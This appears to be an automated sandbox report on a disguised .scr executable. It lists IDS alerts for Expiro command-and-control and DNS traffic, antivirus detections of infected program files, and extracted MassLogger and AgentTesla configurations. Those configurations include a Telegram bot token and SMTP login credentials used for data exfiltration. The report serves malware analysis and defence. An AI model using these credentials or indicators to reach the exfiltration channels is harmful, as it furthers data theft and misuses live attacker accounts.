Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T06:44:54.312485+0100	2051651	1	A Network Trojan was detected	192.168.2.4	63363	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T06:41:14.394986+0100	2051649	1	A Network Trojan was detected	192.168.2.4	53257	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T06:41:11.009333+0100	2051648	1	A Network Trojan was detected	192.168.2.4	54346	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T06:41:04.790478+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49732	TCP
2024-11-28T06:41:06.032019+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49733	TCP
2024-11-28T06:41:11.056923+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49739	TCP
2024-11-28T06:42:52.124720+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49860	TCP
2024-11-28T06:43:04.592026+0100	2018141	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49890	TCP
2024-11-28T06:43:06.709429+0100	2018141	1	A Network Trojan was detected	18.208.156.248	80	192.168.2.4	49896	TCP
2024-11-28T06:43:11.648505+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49904	TCP
2024-11-28T06:43:17.543971+0100	2018141	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.4	49909	TCP
2024-11-28T06:43:19.271629+0100	2018141	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49910	TCP
2024-11-28T06:43:28.216662+0100	2018141	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.4	49915	TCP
2024-11-28T06:44:54.434942+0100	2018141	1	A Network Trojan was detected	3.254.94.185	80	192.168.2.4	49950	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T06:41:04.790478+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49732	TCP
2024-11-28T06:41:06.032019+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49733	TCP
2024-11-28T06:41:11.056923+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49739	TCP
2024-11-28T06:42:52.124720+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49860	TCP
2024-11-28T06:43:04.592026+0100	2037771	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49890	TCP
2024-11-28T06:43:06.709429+0100	2037771	1	A Network Trojan was detected	18.208.156.248	80	192.168.2.4	49896	TCP
2024-11-28T06:43:11.648505+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49904	TCP
2024-11-28T06:43:17.543971+0100	2037771	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.4	49909	TCP
2024-11-28T06:43:19.271629+0100	2037771	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49910	TCP
2024-11-28T06:43:28.216662+0100	2037771	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.4	49915	TCP
2024-11-28T06:44:54.434942+0100	2037771	1	A Network Trojan was detected	3.254.94.185	80	192.168.2.4	49950	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T06:41:07.763274+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	158.101.44.242	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T06:41:02.280797+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49730	54.244.188.177	80	TCP
2024-11-28T06:42:03.143316+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49753	82.112.184.197	80	TCP
2024-11-28T06:43:08.535788+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49900	208.100.26.245	80	TCP
2024-11-28T06:44:16.660328+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49931	18.246.231.120	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Order SMG 201906 20190816order.pdf.scr.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7795961032:AAHl2Gyn1IRHeiB38gCoc9MZJfyaE9R5m3s", "Telegram Chatid": "5330396417"}
Source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for domain / URL

Source: uaafd.biz	Virustotal: Detection: 13%	Perma Link
Source: vjaxhpbji.biz	Virustotal: Detection: 13%	Perma Link
Source: pywolwnvd.biz	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: Order SMG 201906 20190816order.pdf.scr.exe	Virustotal: Detection: 83%			Perma Link
Source: Order SMG 201906 20190816order.pdf.scr.exe	ReversingLabs: Detection: 84%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Order SMG 201906 20190816order.pdf.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Order SMG 201906 20190816order.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49737 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1667931149.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1792845772.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: elevation_service.exe, 00000008.00000003.3008858965.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1960507002.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1960507002.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 00000008.00000003.2867483561.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000008.00000003.3239648950.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.2183358754.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2186527465.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3193969354.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 00000008.00000003.2847524053.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 00000008.00000003.2885089406.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: plugin-container.pdb source: alg.exe, 00000002.00000003.2377892123.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: surmit.exe, 00000007.00000003.1720282746.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000007.00000003.1721982682.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1842133284.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1845782469.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1871704458.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1874030134.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1931467591.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 00000008.00000003.2930503642.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.2172656411.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3191762668.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 00000008.00000003.2930503642.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.2113247615.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2104394159.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3180869752.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000008.00000003.3249533485.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000008.00000003.3248356651.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pingsender.pdb source: alg.exe, 00000002.00000003.2358775588.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000008.00000003.3246866849.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 00000008.00000003.2821521866.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000008.00000003.3235518445.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1821426163.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1804046994.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000008.00000003.3246000080.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1710268245.00000000015C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.2172656411.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3191762668.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2334420956.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 00000008.00000003.2908936431.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2893603970.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2895104361.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.2003390903.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2334420956.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000008.00000003.3246866849.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdate_unsigned.pdb source: elevation_service.exe, 00000008.00000003.3229747575.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.2019997870.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 00000008.00000003.2908936431.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2893603970.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2895104361.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000008.00000003.3241252093.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000008.00000003.3249533485.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000008.00000003.3235518445.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.2113247615.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2104394159.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3180869752.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: surmit.exe, 00000007.00000003.1720282746.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000007.00000003.1721982682.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1842133284.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1845782469.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1871704458.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1874030134.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: elevation_service.exe, 00000008.00000003.3022810009.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: elevation_service.exe, 00000008.00000003.3022810009.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1671928679.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000008.00000003.3244398060.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 00000008.00000003.2853593033.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 00000008.00000003.2821521866.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000008.00000003.3244398060.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: elevation_service.exe, 00000008.00000003.2949349411.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2068666301.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.2169021270.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.2096908826.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.2156038493.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2149245390.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2148327892.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189590944.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189700078.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 00000008.00000003.2867483561.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000008.00000003.3243580949.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1975568449.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000008.00000003.3245192353.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2294220275.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000008.00000003.3247717995.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.2092326400.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: elevation_service.exe, 00000008.00000003.3110281493.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.2003390903.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1804046994.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 00000008.00000003.2925406649.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2916919565.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1975568449.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdb source: alg.exe, 00000002.00000003.2384944423.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
